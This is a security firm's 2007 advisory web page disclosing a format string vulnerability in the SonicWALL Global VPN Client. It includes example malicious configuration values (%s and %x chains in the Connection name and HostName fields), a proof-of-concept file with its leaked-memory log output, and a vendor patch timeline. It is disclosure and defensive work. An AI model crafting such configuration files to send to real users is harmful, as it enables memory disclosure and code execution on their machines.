>> Deutsch | >> Français
HomeServicesSecurity ContentCareerAbout UsContact
News ArchiveMonthly ContentNewsletter SignupWhitepapersUseful LinksAdvisories
 

 
 

>> Security Content >> Advisories >> SonicWALL Global VPN Client Format String Vulnerability  
 

SEC Consult Security Advisory < 20071204-0 >

==============================================

title: SonicWALL Global VPN Client Format String Vulnerability

program: SonicWALL Global VPN Client

vulnerable version: < 4.0.0.830

homepage: www.sonicwall.com

found: 06-12-2007

by: lofi42*

==============================================

 

Vendor description:

---------------

 

The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.

 

 

Vulnerabilty overview:

---------------

 

SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.

 

 

Vulnerability details:

---------------

 

Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "Hostname" Tags in the configuration file.

 

Examples:

 

<Connection name=%s%s%s%s>

<HostName>%s%s%s%s</HostName>

 

The bugs has been verified in version 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version beta 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log.

 

 

Proof-of-concept:

---------------

 

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

 

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

.%x.%x.%x.%x.%x.%x.%x

 

...yields the following logfile:

 

----------------------< Connection name >-----------------------------------

OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.

46413139.203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.

65685427.6e6f6320.7463656e.206e6f69.41414122.41414141.25414141

" has been enabled.' ''

----------------------</Connection name >-----------------------------------

----------------------<HostName>--------------------------------------------

BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.

2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.

252e7825.78252e78.2e78252e.74207825.6e61206f.20504920.72646461.

2e737365.42272027.42424242.42424242'

----------------------</HostName>---------------------------------------

 

 

vendor status:

---------------

vendor notified: 2007-08-16

vendor response: 2007-08-29

patch available: 2007-11-26

 

The issue has been fixed in SonicWall VPN client 4.0.0.830.

 

 

 

 

 
Current

15.09. - 17.09.2008

Implementation of Information Security Management Systems based on ISO 27001:2005 [more...]

 

[Archives]

 


SEC-Advisories
[SA20071204-0] SonicWALL Global VPN Client Format String Vulnerability
[SA20071101-0] Multiple Vulnerabilties in SonicWALL SSL-VPN Client
[SA20071031-0] Perdition IMAP Proxy Format String Vulnerability
[SA20071012-0] Madwifi xrates element remote DOS
[SA20070722-0] Remote Command Execution in Joomla! CMS
[SA20070601-0] PHP chunk_split() Integer Overflow
[more...]
  Impressum :: SEC CONSULT :: PHONE +43/1/890 30 43 - 0 :: FAX - 15 :: EMAIL office@sec-consult.com